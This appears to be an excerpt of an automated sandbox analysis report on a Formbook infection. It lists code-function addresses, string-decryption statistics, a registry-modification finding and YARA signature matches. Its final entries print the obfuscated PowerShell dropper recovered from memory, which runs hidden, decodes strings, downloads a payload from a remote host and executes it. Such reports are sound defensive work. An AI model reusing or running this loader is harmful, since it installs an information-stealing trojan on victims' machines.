Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044D6C0	17_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004476F0	17_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B870	17_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044081D	17_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00414957	17_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004079EE	17_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00407AEB	17_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044AA80	17_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00412AA9	17_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404B74	17_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404B03	17_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044BBD8	17_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404BE5	17_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00404C76	17_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00415CFE	17_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00416D72	17_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00446D30	17_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00446D8B	17_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00406E8F	17_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00405038	18_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0041208C	18_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004050A9	18_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0040511A	18_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043C13A	18_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004051AB	18_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00449300	18_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0040D322	18_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A4F0	18_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043A5AB	18_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00413631	18_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00446690	18_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A730	18_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004398D8	18_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004498E0	18_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044A886	18_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0043DA09	18_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00438D5E	18_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00449ED0	18_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0041FE83	18_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00430F54	18_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004050C2	19_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004014AB	19_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00405133	19_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004051A4	19_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401246	19_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040CA46	19_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00405235	19_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004032C8	19_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00401689	19_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402F60	19_2_00402F60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482F488	20_2_0482F488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482F140	20_2_0482F140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D481CC	26_2_21D481CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9B1B0	26_2_21C9B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D501AA	26_2_21D501AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D18158	26_2_21D18158
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC516C	26_2_21CC516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F172	26_2_21C7F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5B16B	26_2_21D5B16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80100	26_2_21C80100
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2A118	26_2_21D2A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C970C0	26_2_21C970C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F0CC	26_2_21D3F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F0E0	26_2_21D4F0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D470E9	26_2_21D470E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D503E6	26_2_21D503E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9E3F0	26_2_21C9E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD739A	26_2_21CD739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7D34C	26_2_21C7D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4132D	26_2_21D4132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB2C0	26_2_21CAB2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D312ED	26_2_21D312ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C952A0	26_2_21C952A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30274	26_2_21D30274
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D50591	26_2_21D50591
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2D5B0	26_2_21D2D5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47571	26_2_21D47571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3E4F6	26_2_21D3E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D42446	26_2_21D42446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F43F	26_2_21D4F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4F7B0	26_2_21D4F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB4750	26_2_21CB4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90770	26_2_21C90770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D416CC	26_2_21D416CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAC6E0	26_2_21CAC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C95990	26_2_21C95990
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C929A0	26_2_21C929A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5A9A6	26_2_21D5A9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C99950	26_2_21C99950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAB950	26_2_21CAB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA6962	26_2_21CA6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C938E0	26_2_21C938E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE8F0	26_2_21CBE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C768B8	26_2_21C768B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C92840	26_2_21C92840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9A840	26_2_21C9A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CFD800	26_2_21CFD800
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D46BD7	26_2_21D46BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D05BF0	26_2_21D05BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CCDBF9	26_2_21CCDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4AB40	26_2_21D4AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3DAC6	26_2_21D3DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8EA80	26_2_21C8EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD5AA0	26_2_21CD5AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2DAAC	26_2_21D2DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47A46	26_2_21D47A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FA49	26_2_21D4FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D03A6C	26_2_21D03A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAFDC0	26_2_21CAFDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8ADE0	26_2_21C8ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA8DBF	26_2_21CA8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D41D5A	26_2_21D41D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D47D73	26_2_21D47D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9AD00	26_2_21C9AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FCF2	26_2_21D4FCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80CF2	26_2_21C80CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D30CB5	26_2_21D30CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9EC60	26_2_21C9EC60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82FC8	26_2_21C82FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C91F92	26_2_21C91F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FFB1	26_2_21D4FFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0EFA0	26_2_21D0EFA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D04F40	26_2_21D04F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4FF09	26_2_21D4FF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CD2F28	26_2_21CD2F28
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB0F30	26_2_21CB0F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4EEDB	26_2_21D4EEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4CE93	26_2_21D4CE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA2E90	26_2_21CA2E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C99EB0	26_2_21C99EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90E5B	26_2_21C90E5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D4EE26	26_2_21D4EE26

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CD7E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21C7B970 appears 220 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CC5130 appears 34 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21CFEA12 appears 81 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 21D0F290 appears 98 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 00416760 appears 69 times

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Yara signature match

Source: amsi32_7860.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8084.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: wab.exe, 0000000A.00000002.4231459057.000000000A087000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exer='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Host Application = powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS 